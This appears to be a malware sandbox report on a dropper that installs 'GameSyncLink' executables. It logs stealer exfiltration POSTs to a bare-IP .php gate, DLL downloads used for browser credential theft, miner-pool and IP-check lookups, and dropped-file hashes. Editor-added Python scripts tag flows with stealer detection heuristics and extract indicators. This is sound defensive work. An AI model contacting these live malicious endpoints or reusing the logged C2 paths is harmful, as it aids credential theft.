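        addr, target, proto, proc, sent, recv, method = [c.strip() for c in line.split("|")]
        ip, port = addr.rsplit(":", 1)
        flows.append(Flow(ip, int(port), "" if target == "-" else target,
                          "" if proto == "-" else proto, proc,
                          parse_size(sent), parse_size(recv),
                          "" if method == "-" else method))
    return flows


# Heuristics (assumptions by the editor; extend and tune for your estate).
IP_CHECK_HOSTS = {"api.myip.com", "ipinfo.io", "api.ipify.org", "ip-api.com"}
LOLBINS_NO_NETWORK = {"caspol.exe", "regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
BARE_IP_URL = re.compile(r"^http://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(/.*)?$")
STEALC_GATE = re.compile(r"^/[0-9a-f]{16}\.php$")   # 16-hex .php gate, a known Stealc convention
EXFIL_BYTES = 100_000                               # assumed threshold for "large upload"


def tag_flow(f: Flow) -> list[str]:
    """Attach triage tags to one flow and return them."""
    tags = []
    m = BARE_IP_URL.match(f.target) if f.proto == "http" else None
    path = (m.group(2) or "/") if m else ""
    if f.proto == "tls" and f.target in IP_CHECK_HOSTS:
        tags.append("ip-geolocation-check")          # stealers profile the victim's IP first
    if f.process.lower() in LOLBINS_NO_NETWORK:
        tags.append("lolbin-outbound")               # e.g. CasPol.exe hosting injected code
    if m and path.lower().endswith(".exe"):
        tags.append("exe-download-bare-ip")          # plain-HTTP payload fetch from a raw IP
    if m and STEALC_GATE.match(path):
        tags.append("stealc-style-gate")
    if f.method == "POST" and f.sent >= EXFIL_BYTES:
        tags.append("large-post")                    # upload-sized request body
    if not f.proto and f.port not in (80, 443):
        tags.append("raw-tcp-nonstandard-port")      # unparsed beacon, e.g. 8080
    f.tags = tags
    return tags


def extract_iocs(flows: list[Flow]) -> dict:
    """Unique IPs, non-IP hostnames and full URLs, ready for a blocklist."""
    hosts, urls = set(), set()
    for f in flows:
        if f.proto == "tls":
            hosts.add(f.target)
        elif f.proto == "http":
            urls.add(f.target)
            h = urlsplit(f.target).hostname
            if h and not BARE_IP_URL.match(f"http://{h}"):
                hosts.add(h)
    return {"ips": sorted({f.ip for f in flows}), "hosts": sorted(hosts), "urls": sorted(urls)}


if __name__ == "__main__":
    flows = parse_rows(SAMPLE_ROWS)
    for f in flows:
        print(f"{f.process:30} {f.ip}:{f.port:<6} {f.target[:50]:50} {tag_flow(f)}")
    print(extract_iocs(flows))
```

The tags are deliberately coarse: a single "large-post" or "ip-geolocation-check" is weak on its own, but the combination seen here (IP check, plain-HTTP .exe fetches from bare IPs, then a megabyte POST to a 16-hex .php gate from a freshly dropped executable) is the stealer pattern worth alerting on as a sequence rather than as individual hits. The svc.iolo.com row shows why hostnames should be reviewed, not blocked blindly: a legitimate vendor endpoint contacted by a dropped binary is still an indicator of the pay-per-install chain, but not a C2.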
• 185.172.128.150:80 | http://185.172.128.150/c698e1bc8a2f5e6d.php | http | u2rs.0.exe | 1.0MB | 5.4MB | 4688 | 4346
  HTTP Request: POST http://185.172.128.150/c698e1bc8a2f5e6d.php
  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  399 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 185.93.2.244:443
                                                                                                                                                                                                                                                                  download.iolo.net
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  2.2MB
                                                                                                                                                                                                                                                                  61.1MB
                                                                                                                                                                                                                                                                  36141
                                                                                                                                                                                                                                                                  43924
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  399 B
                                                                                                                                                                                                                                                                  228 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                • 20.157.87.45:80

                                                                                                                                                                                                                                                                  headraisepresidensu.shop

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.21.50.137
                                                                                                                                                                                                                                                                  172.67.206.145

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  137.50.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  157.92.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  ctldl.windowsupdate.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  2.18.190.77
                                                                                                                                                                                                                                                                  2.18.190.79

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  pastebin.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.20.3.235
                                                                                                                                                                                                                                                                  172.67.19.24
                                                                                                                                                                                                                                                                  104.20.4.235

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  firstfirecar.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.21.60.76
                                                                                                                                                                                                                                                                  172.67.193.220

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  14.90.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  svc.iolo.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  20.157.87.45

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  148.155.9.20.in-addr.arpa

                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                  216.39.21.104.in-addr.arpa
                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                  987 B
                                                                                                                                                                                                                                                                  1.9kB
                                                                                                                                                                                                                                                                  14
                                                                                                                                                                                                                                                                  14

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  216.39.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  139.173.67.172.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  30.186.67.172.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  xmr.2miners.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  162.19.139.184

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  147.162.67.172.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  251.62.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  1.141.192.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  125.3.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  112.242.109.65.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  yip.su

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  172.67.169.89
                                                                                                                                                                                                                                                                  104.21.79.77

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  jonathantwo.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.21.31.124
                                                                                                                                                                                                                                                                  172.67.176.131

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  192.182.67.172.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  228.128.172.185.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  westus2-2.in.applicationinsights.azure.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  20.9.155.148

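The in-addr.arpa names in these flows are reverse (PTR) lookups: the four leading labels are the octets of an IPv4 address in reverse order, so 5.192.67.172.in-addr.arpa is a lookup of 172.67.192.5. As an added example, not part of the sandbox report, the following Python parses a listing in the "DNS Request / DNS Response" layout used here, turns each PTR name back into the address it encodes, and ties reverse lookups to the hostnames whose A answers contained the same address. The input is a constructed subset of the entries on this page, and the function names are my own.

```python
import ipaddress
import re
from collections import OrderedDict

# Constructed sample in the layout of the report above (a subset of its entries).
SAMPLE_LOG = """
DNS Request

acceptabledcooeprs.shop

DNS Response

104.21.59.156
172.67.180.137

DNS Request

5.192.67.172.in-addr.arpa

DNS Request

xmr.2miners.com

DNS Response

162.19.139.184

DNS Request

184.139.19.162.in-addr.arpa
"""

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def ptr_to_ipv4(name):
    """Turn a PTR owner name such as 5.192.67.172.in-addr.arpa into 172.67.192.5.
    Returns None when the name is not a well-formed IPv4 reverse name."""
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    candidate = ".".join(reversed(octets))
    try:
        return str(ipaddress.IPv4Address(candidate))  # rejects octets > 255 etc.
    except ValueError:
        return None


def parse_dns_log(text):
    """Parse the flattened listing. Returns (forward, ptr): forward maps each
    queried hostname to the A records listed under its DNS Response; ptr maps
    each reverse name to the IPv4 address it encodes."""
    forward = OrderedDict()
    ptr = OrderedDict()
    current = None   # hostname whose response block we are inside, if any
    mode = None      # "request" or "response"
    for ln in (l.strip() for l in text.splitlines()):
        if not ln:
            continue
        if ln == "DNS Request":
            mode = "request"
            continue
        if ln == "DNS Response":
            mode = "response"
            continue
        if mode == "request":
            ip = ptr_to_ipv4(ln)
            if ip is not None:
                ptr[ln] = ip
                current = None  # PTR queries get no answer block in the report
            else:
                current = ln
                forward.setdefault(ln, [])
        elif mode == "response" and current is not None and IPV4_RE.match(ln):
            forward[current].append(ln)
    return forward, ptr


def reverse_lookups_matching_answers(forward, ptr):
    """Addresses that appear both as an A answer and as a PTR target, mapped to
    the hostname that resolved to them. A reverse query for an address the
    sample just resolved is a useful hint that it actually connected there."""
    answered = {ip: host for host, ips in forward.items() for ip in ips}
    return {ip: answered[ip] for ip in ptr.values() if ip in answered}


if __name__ == "__main__":
    fwd, rev = parse_dns_log(SAMPLE_LOG)
    for host, ips in fwd.items():
        print(f"{host} -> {', '.join(ips) or '(no answer listed)'}")
    for name, ip in rev.items():
        print(f"PTR {name} -> {ip}")
    print("reverse lookups of resolved addresses:", reverse_lookups_matching_answers(fwd, rev))
```

Run it against the full listing by pasting the page's entries into SAMPLE_LOG; the Cloudflare-range answers (104.21.x.x, 172.67.x.x) are shared proxy addresses, so treat the hostnames, not those IPs, as the indicators worth blocking.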
• 8.8.8.8:53 | 156.59.21.104.in-addr.arpa | dns | 1.0kB | 1.8kB | 15 | 15
  DNS Request: 156.59.21.104.in-addr.arpa
  DNS Request: plaintediousidowsko.shop
  DNS Response: 104.21.53.146, 172.67.213.139
  DNS Request: holicisticscrarws.shop
  DNS Response: 172.67.183.72, 104.21.40.92
  DNS Request: 47.151.221.77.in-addr.arpa
  DNS Request: 78.96.42.5.in-addr.arpa
  DNS Request: lineagelasserytailsd.shop
  DNS Response: 104.21.62.251, 172.67.141.60
  DNS Request: bbuseruploads.s3.amazonaws.com
  DNS Response: 52.216.137.116, 16.182.74.217, 52.217.131.1, 54.231.204.145, 16.182.64.225, 3.5.29.79, 52.217.126.153, 52.217.235.185

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  116.137.216.52.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  123.48.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  steamcommunity.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.68.92.92

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  nexusrules.officeapps.live.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  52.111.243.30

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  realdeepai.org

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.21.90.14
                                                                                                                                                                                                                                                                  172.67.193.79

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  89.169.67.172.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  59.9.26.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  svc.iolo.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  20.157.87.45

                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop
                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  958 B
                                                                                                                                                                                                                                                                  1.7kB
                                                                                                                                                                                                                                                                  14
                                                                                                                                                                                                                                                                  14

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  miniaturefinerninewjs.shop

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  172.67.173.139
                                                                                                                                                                                                                                                                  104.21.30.191

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  201.44.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  67.65.42.5.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  86.229.13.49.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  sofaprivateawarderysj.shop

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  172.67.169.40
                                                                                                                                                                                                                                                                  104.21.95.16

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  bitbucket.org

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.192.141.1

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  127.85.21.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  prideconstituiiosjk.shop

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.21.92.157
                                                                                                                                                                                                                                                                  172.67.195.106

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  92.92.68.104.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  30.243.111.52.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  1xst.ru

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  185.18.245.58
                                                                                                                                                                                                                                                                  84.252.15.104
                                                                                                                                                                                                                                                                  130.204.29.121
                                                                                                                                                                                                                                                                  200.45.93.45
                                                                                                                                                                                                                                                                  189.61.54.32
                                                                                                                                                                                                                                                                  102.189.33.84
                                                                                                                                                                                                                                                                  95.158.162.200
                                                                                                                                                                                                                                                                  187.225.176.41
                                                                                                                                                                                                                                                                  125.7.253.10
                                                                                                                                                                                                                                                                  211.168.53.110

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  59.128.172.185.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  api.myip.com

                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                  104.26.9.59
                                                                                                                                                                                                                                                                  172.67.75.163
                                                                                                                                                                                                                                                                  104.26.8.59

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  150.128.172.185.in-addr.arpa

                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                  64.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                  214 B
                                                                                                                                                                                                                                                                  360 B
                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                  3

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  64.96.42.5.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  90.128.172.185.in-addr.arpa

                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                  25.173.189.20.in-addr.arpa

                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                  58.245.18.185.in-addr.arpa
                                                                                                                                                                                                                                                                  dns
  143 B sent / 289 B received, 2 packets sent / 2 packets received
  DNS Request: 58.245.18.185.in-addr.arpa
  DNS Request: 45.87.157.20.in-addr.arpa

• 8.8.8.8:53
  124.31.21.104.in-addr.arpa
  dns
  190 B sent / 310 B received, 3 packets sent / 3 packets received
  DNS Request: 124.31.21.104.in-addr.arpa
  DNS Request: ipinfo.io
  DNS Response: 34.117.186.192
  DNS Request: download.iolo.net
  DNS Response: 185.93.2.244

• 8.8.8.8:53
  76.60.21.104.in-addr.arpa
  dns
  211 B sent / 374 B received, 3 packets sent / 3 packets received
  DNS Request: 76.60.21.104.in-addr.arpa
  DNS Request: 10.66.42.5.in-addr.arpa
  DNS Request: 244.2.93.185.in-addr.arpa

• 224.0.0.251:5353
  474 B sent, 6 packets sent (multicast, nothing received)

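The in-addr.arpa names in the table are reverse (PTR) lookups: each one is an IPv4 address the sample had already contacted, written with its octets reversed. The following is an added example, not part of the sandbox report, that decodes those names into forward IPs, adds the resolved answers, and hunts for the resulting indicators in a DNS client log. The log line format (`<timestamp> <host> <qname>`) and the hostnames ws01/ws02 are constructed assumptions; the DNS events themselves are transcribed from the table above.

```python
import ipaddress

# DNS events transcribed from the report's network table. Names ending in
# in-addr.arpa are reverse (PTR) lookups the sample made for IPs it had
# already talked to, so the IPs they encode are the ones worth hunting for.
DNS_REQUESTS = [
    "58.245.18.185.in-addr.arpa",
    "45.87.157.20.in-addr.arpa",
    "124.31.21.104.in-addr.arpa",
    "ipinfo.io",
    "download.iolo.net",
    "76.60.21.104.in-addr.arpa",
    "10.66.42.5.in-addr.arpa",
    "244.2.93.185.in-addr.arpa",
]
DNS_RESPONSES = {"ipinfo.io": "34.117.186.192", "download.iolo.net": "185.93.2.244"}

# Constructed DNS client log (not from the report): "<timestamp> <host> <qname>".
SAMPLE_LOG = [
    "2024-05-11T22:40:01Z ws01 76.60.21.104.in-addr.arpa",
    "2024-05-11T22:40:02Z ws01 www.microsoft.com",
    "2024-05-11T22:40:03Z ws02 ipinfo.io",
    "2024-05-11T22:40:04Z ws02 1.1.1.1.in-addr.arpa",
]

PTR_SUFFIX = ".in-addr.arpa"


def ptr_to_ip(name):
    """Decode an IPv4 PTR name: '58.245.18.185.in-addr.arpa' -> '185.18.245.58'.

    Returns None for anything that is not a well-formed four-label PTR name.
    """
    name = name.rstrip(".").lower()
    if not name.endswith(PTR_SUFFIX):
        return None
    labels = name[: -len(PTR_SUFFIX)].split(".")
    if len(labels) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(labels))))
    except ipaddress.AddressValueError:
        return None


def build_iocs(requests, responses):
    """Split the report's DNS events into a set of IPs and a set of domains."""
    ips, domains = set(), set()
    for qname in requests:
        ip = ptr_to_ip(qname)
        if ip:
            ips.add(ip)
        else:
            domains.add(qname.lower())
    ips.update(responses.values())
    return ips, domains


def match_dns_log(lines, ips, domains):
    """Return [(line_no, indicator)] for log lines whose query hits an IOC.

    PTR queries in the log are decoded first, so a reverse lookup of an
    IOC address matches on the address rather than on the literal name.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 3:
            continue  # skip malformed lines rather than abort the hunt
        qname = parts[2].rstrip(".").lower()
        ip = ptr_to_ip(qname)
        if ip in ips:
            hits.append((n, ip))
        elif qname in domains:
            hits.append((n, qname))
    return hits


if __name__ == "__main__":
    ips, domains = build_iocs(DNS_REQUESTS, DNS_RESPONSES)
    print("IPs:", sorted(ips))
    print("Domains:", sorted(domains))
    for n, indicator in match_dns_log(SAMPLE_LOG, ips, domains):
        print(f"line {n}: {indicator}")
```

Decoding gives 185.18.245.58, 20.157.87.45, 104.21.31.124, 104.21.60.76, 5.42.66.10 and 185.93.2.244; the last one is also the answer for download.iolo.net, so the sample reverse-resolved an address it had just obtained. Weigh hits accordingly: ipinfo.io is a public IP geolocation API, download.iolo.net is a software vendor's download host, and 104.21.0.0/16 lies in Cloudflare's shared range, so any of those alone is a weak signal and should be corroborated with the dropped-file hashes listed under Downloads.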
                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15


                                                                                                                                                                                                                                                                Downloads

• C:\Program Files (x86)\GameSyncLink\GameService.exe
  Filesize: 288KB
  MD5: d9ec6f3a3b2ac7cd5eef07bd86e3efbc
  SHA1: e1908caab6f938404af85a7df0f80f877a4d9ee6
  SHA256: 472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
  SHA512: 1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

• C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  Filesize: 2.5MB
  MD5: e6943a08bb91fc3086394c7314be367d
  SHA1: 451d2e171f906fa6c43f8b901cd41b0283d1fa40
  SHA256: aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873
  SHA512: 505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

• C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  Filesize: 6.2MB
  MD5: 1bacbebf6b237c75dbe5610d2d9e1812
  SHA1: 3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1
  SHA256: c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d
  SHA512: f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

• C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  Filesize: 13.2MB
  MD5: 72b396a9053dff4d804e07ee1597d5e3
  SHA1: 5ec4fefa66771613433c17c11545c6161e1552d5
  SHA256: d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d
  SHA512: ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

• C:\Program Files (x86)\GameSyncLink\installc.bat
  Filesize: 301B
  MD5: 998ab24316795f67c26aca0f1b38c8ce
  SHA1: a2a6dc94e08c086fe27f8c08cb8178e7a64f200d
  SHA256: a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e
  SHA512: 7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

• C:\Program Files (x86)\GameSyncLink\installg.bat
  Filesize: 284B
  MD5: 5dee3cbf941c5dbe36b54690b2a3c240
  SHA1: 82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1
  SHA256: 98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb
  SHA512: 9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

• C:\Program Files (x86)\GameSyncLink\installm.bat
  Filesize: 218B
  MD5: 94b87b86dc338b8f0c4e5869496a8a35
  SHA1: 2584e6496d048068f61ac72f5c08b54ad08627c3
  SHA256: 2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc
  SHA512: b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                                                                                                                                                                                                • C:\ProgramData\AEBAFBGI

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  112KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  87210e9e528a4ddb09c6b671937c79c6

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  3c75314714619f5b55e25769e0985d497f0062f2

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

                                                                                                                                                                                                                                                                • C:\ProgramData\Are.docx

                                                                                                                                                                                                                                                                  Filesize

